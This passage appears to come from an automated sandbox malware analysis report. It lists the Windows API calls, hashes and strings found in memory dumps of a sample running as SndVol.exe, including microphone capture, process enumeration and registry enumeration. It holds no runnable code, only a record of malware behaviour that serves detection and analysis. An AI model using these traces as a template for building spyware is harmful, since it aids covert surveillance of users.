                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 3033488037-0
                                                                  • Opcode ID: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
                                                                  • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                                                  • Opcode Fuzzy Hash: bba606fc377604b84075189b83cc930c3fba5f0d417d2f8c667cfcff3c73436f
                                                                  • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                                                  APIs
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                  • _free.LIBCMT ref: 004468EC
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 00446AB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                  • String ID:
                                                                  • API String ID: 1286116820-0
                                                                  • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                  • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                                                  • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                  • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                                                  APIs
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 04927696
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 0492770E
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 0492773B
                                                                  • _free.LIBCMT ref: 04927684
                                                                    • Part of subcall function 04924A2A: HeapFree.KERNEL32(00000000,00000000,?,0492EBE7,?,00000000,?,00000000,?,0492EE8B,?,00000007,?,?,0492F3D6,?), ref: 04924A40
                                                                    • Part of subcall function 04924A2A: GetLastError.KERNEL32(?,?,0492EBE7,?,00000000,?,00000000,?,0492EE8B,?,00000007,?,?,0492F3D6,?,?), ref: 04924A52
                                                                  • _free.LIBCMT ref: 04927850
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                  • String ID:
                                                                  • API String ID: 1286116820-0
                                                                  • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                  • Instruction ID: 8ba5c3f290513dc6a0c2fcf71d3986616c6a927707e76fa42a8f43081d1d81cb
                                                                  • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                  • Instruction Fuzzy Hash: DE51E771900229EBDB10EFE99E809AA77FCEF84315B1006FAE454A7194FB70AE44CB55
                                                                  APIs
                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                                                                    • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                                                                    • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 1735047541-0
                                                                  • Opcode ID: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
                                                                  • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                                                                  • Opcode Fuzzy Hash: 322a21650b7cdb691a380e1f32b584157382834de1627d8e80e9ce1f3e3b7542
                                                                  • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                  • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                                                  • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                  • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                                                  • __alloca_probe_16.LIBCMT ref: 0044E391
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                                                  • __freea.LIBCMT ref: 0044E3FD
                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                  • String ID:
                                                                  • API String ID: 313313983-0
                                                                  • Opcode ID: b11d3600e2aa565fdc4ed9d3d5ae446cbeb211535541ee0462b0a0c8c7e06313
                                                                  • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                                                  • Opcode Fuzzy Hash: b11d3600e2aa565fdc4ed9d3d5ae446cbeb211535541ee0462b0a0c8c7e06313
                                                                  • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                                                  APIs
                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                                                  • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                                                  • waveInStart.WINMM ref: 00401CDE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                  • String ID:
                                                                  • API String ID: 1356121797-0
                                                                  • Opcode ID: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                  • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                                                  • Opcode Fuzzy Hash: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                  • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                                                  • _free.LIBCMT ref: 0044C59F
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                  • String ID:
                                                                  • API String ID: 336800556-0
                                                                  • Opcode ID: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
                                                                  • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                                                  • Opcode Fuzzy Hash: 825181044c3797c199998a294b9de2a6dd0a27ea62f95a6f222d210b691a6f07
                                                                  • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                  • int.LIBCPMT ref: 0040FBE8
                                                                    • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                    • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                  • String ID:
                                                                  • API String ID: 2536120697-0
                                                                  • Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                  • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                                                  • Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                  • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00439A11,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004457AE
                                                                  • _free.LIBCMT ref: 004457E3
                                                                  • _free.LIBCMT ref: 0044580A
                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445817
                                                                  • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00445820
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                  • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
                                                                  • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                  • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,?,0491A7A9,00000000,?,?,0491A82D,00000000,00000000,00000000,00000000,00000000,?,?), ref: 04926546
                                                                  • _free.LIBCMT ref: 0492657B
                                                                  • _free.LIBCMT ref: 049265A2
                                                                  • SetLastError.KERNEL32(00000000), ref: 049265AF
                                                                  • SetLastError.KERNEL32(00000000), ref: 049265B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free
                                                                  • String ID:
                                                                  • API String ID: 3170660625-0
                                                                  • Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                  • Instruction ID: ec520b82175ce71785997ed2480753d0e81ced0aba00b03946ba876796f1f4a5
                                                                  • Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
                                                                  • Instruction Fuzzy Hash: D70149722006323BE3126E356F44E2B266EDBD25657210535F805D259CFA74FE01D264
                                                                  APIs
                                                                  • _free.LIBCMT ref: 0044DBB4
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 0044DBC6
                                                                  • _free.LIBCMT ref: 0044DBD8
                                                                  • _free.LIBCMT ref: 0044DBEA
                                                                  • _free.LIBCMT ref: 0044DBFC
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                  • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                                                  • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                  • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00441566
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 00441578
                                                                  • _free.LIBCMT ref: 0044158B
                                                                  • _free.LIBCMT ref: 0044159C
                                                                  • _free.LIBCMT ref: 004415AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                  • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                                                  • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                  • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                                                  APIs
                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Enum$InfoQueryValue
                                                                  • String ID: [regsplt]
                                                                  • API String ID: 3554306468-4262303796
                                                                  • Opcode ID: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                  • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                                                  • Opcode Fuzzy Hash: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                  • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                                                  APIs
                                                                  • _strpbrk.LIBCMT ref: 0044B918
                                                                  • _free.LIBCMT ref: 0044BA35
                                                                    • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                                    • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
                                                                    • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                  • String ID: *?$.
                                                                  • API String ID: 2812119850-3972193922
                                                                  • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                  • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
                                                                  • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                  • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
                                                                  APIs
                                                                  • _strpbrk.LIBCMT ref: 0492C6B0
                                                                  • _free.LIBCMT ref: 0492C7CD
                                                                    • Part of subcall function 0491A83B: IsProcessorFeaturePresent.KERNEL32(00000017,0491A80D,?,?,?,?,?,00000000,?,?,0491A82D,00000000,00000000,00000000,00000000,00000000), ref: 0491A83D
                                                                    • Part of subcall function 0491A83B: GetCurrentProcess.KERNEL32(C0000417), ref: 0491A85F
                                                                    • Part of subcall function 0491A83B: TerminateProcess.KERNEL32(00000000), ref: 0491A866
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                  • String ID: *?$.
                                                                  • API String ID: 2812119850-3972193922
                                                                  • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                  • Instruction ID: 41b5fd7d0f2b20662b34d8306dd22c01034b5d6e724c406d5f31227f971873c7
                                                                  • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                                  • Instruction Fuzzy Hash: 0F518475E0022AAFDF14DFA8C980AADB7F9FF89314F244179D855E7344E771AA018B50
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __alloca_probe_16__freea
                                                                  • String ID: H"G$H"GH"G
                                                                  • API String ID: 1635606685-3036711414
                                                                  • Opcode ID: e481662891375e5a2645b3b08f80f5967694cfef59df56efd529eea01ddaf1f5
                                                                  • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
                                                                  • Opcode Fuzzy Hash: e481662891375e5a2645b3b08f80f5967694cfef59df56efd529eea01ddaf1f5
                                                                  • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0040189E
                                                                  • ExitThread.KERNEL32 ref: 004018D6
                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                  • String ID: 8:G
                                                                  • API String ID: 1649129571-405301104
                                                                  • Opcode ID: e6ba151abec5212b98bdec8079b6b2ba03e66e03ce1f94e02eb72dca0a66db1c
                                                                  • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
                                                                  • Opcode Fuzzy Hash: e6ba151abec5212b98bdec8079b6b2ba03e66e03ce1f94e02eb72dca0a66db1c
                                                                  • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 048E2636
                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 048E266E
                                                                  • waveInUnprepareHeader.WINMM(00001D90,00000020,00000000,?,00000020,00471E78,00000000), ref: 048E277C
                                                                    • Part of subcall function 049132BD: __onexit.LIBCMT ref: 049132C3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                                  • String ID: 8:G
                                                                  • API String ID: 1265842484-405301104
                                                                  • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                                                  • Instruction ID: 885a26408067cff8afd9d2b8cf186ac3fd7a18c77d5bc1336a9d74c2c8434d16
                                                                  • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
                                                                  • Instruction Fuzzy Hash: F14192326142049BE314FB2EDC51ABE775DAB86319F004B6DE589C21E0DFB0B94ACB17
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 00440975
                                                                  • _free.LIBCMT ref: 00440A40
                                                                  • _free.LIBCMT ref: 00440A4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                  • API String ID: 2506810119-3942169294
                                                                  • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                  • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                                                  • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                  • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0492170D
                                                                  • _free.LIBCMT ref: 049217D8
                                                                  • _free.LIBCMT ref: 049217E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$FileModuleName
                                                                  • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                  • API String ID: 2506810119-3942169294
                                                                  • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                  • Instruction ID: 547f642c4f63aa2d79ba4c262d65830017ed6ea5025973ee6bf9a8be65a6e5ad
                                                                  • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                  • Instruction Fuzzy Hash: 3E31B875A00228AFDB21DF95EE81D9EBBFCEBC5314F1040B6E404D7214E6706A55CB91
                                                                  APIs
                                                                    • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
